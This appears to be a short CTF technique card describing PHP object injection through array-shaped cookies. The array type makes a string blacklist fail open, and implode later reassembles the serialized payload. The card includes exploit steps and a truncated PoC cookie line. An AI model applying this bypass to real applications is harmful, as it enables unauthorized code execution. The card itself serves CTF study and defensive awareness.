pwneglyph logo

Note

web php object-injection deserialization blacklist-bypass type-confusion cookie

Send an array-shaped cookie so a string blacklist fails open, then let the app reassemble the serialized payload with implode.

PHP Object Injection with Blacklist Bypass via Cookie Arrays

PHP's request parser can turn a single cookie name into an array via syntax like flans[0]=.... Validation expecting a string then hits type confusion and fails open. The application later normalizes the array back into a string with implode, resurrecting the original serialized payload after the blacklist step.

Why It Works

  • A strpos/regex/substring check on an array value behaves unexpectedly (or never sees the dangerous substring), and the value is rejoined into the payload afterward.

Vulnerable Pattern

  • Filters using strpos, regex, or substring checks on cookie/request values without enforcing scalar type first.

Exploit Flow

  1. Send the dangerous serialized payload through an array-shaped cookie so the blacklist sees an array.
  2. Verify how the application rejoins or reuses the array — the exact reassembly order matters.

Variations

  • Query params, form fields, or repeated headers with framework-dependent array syntax.

Common Blockers

  • Strict type checks, scalar casting before validation, or no rejoin path after the blacklist.

PoC Sketch

Cookie: flans[0]=O:4:"Flan":...
# blacklist receives an array; app later implodes it back into a serialized string

Good Situations To Use It

  • A blacklist filters serialized markers in a cookie string.
  • The value is later joined back (implode) before unserialize.
  • Scalar type isn't enforced before the check.

Sources

  • midnight_flag2026/web/clash_of_flans